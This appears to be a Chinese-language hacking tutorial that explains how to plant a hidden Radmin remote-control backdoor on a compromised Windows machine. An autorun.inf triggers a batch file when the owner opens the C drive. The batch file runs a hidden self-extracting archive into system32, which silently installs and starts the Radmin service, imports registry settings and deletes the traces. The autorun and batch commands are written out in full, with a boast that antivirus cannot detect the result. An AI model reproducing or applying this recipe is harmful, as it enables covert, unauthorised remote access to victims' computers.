這里只需要你有上傳的權限。
一共三個文件:1.Autorun.inf、2.Shell.bat、3.Hao.exe(自解壓文件)。
思路:
全部放在C盤下。當肉雞主人雙擊C盤時自動運行第一文件,第一文件帶動運行第二文件,同時第二運行第三運行完可正常進入C盤。不會讓人發覺。并且里面所帶的批處理,會在最后把所有文件刪除。此時,后門卻已經裝上去了(此法針對沒有權限運行木馬的入侵活動)。
制作:
[autorun] open=shell.bat,這個是autorun.inf @echo off hao.exe c:\windows\explorer c:\ del autorun.inf del rad.exe del shell.ba,這個是shell.bat hao.exe,里面包含admdll.dll、raddrv.dll、admin.reg、pchealthy.exe、r.bat五個文件(關鍵所在)r.bat——批處理做法 @echo off @pchealthy.exe /install /silence @regedit /s admin.reg @net start r_server @del admin.reg @del r.bat,其他四個就是Radmin的文件。這個大家都會,復制過來就行。
我們再來看自解壓的處理。在解壓路徑里我們用 %systemroot%\system32,就是解壓到系統目錄里,并且“解壓后運行”填上我們的r.bat文件。因為這里的文件比較多,比較隱蔽。解壓模式我們選 “全部隱藏”,和 “覆蓋所有文件”! 好了,一個不被殺毒軟件所能查殺的好后門程序就成功制作出來了!
大家不要放在文件夾里壓縮哦,要直接選上admdll.dll、raddrv.dll、admin.reg、pchealthy.exe、r.bat五個文件壓縮,這樣就行啦。
責任編輯: 雪花(TEL:(010)68476636-8008)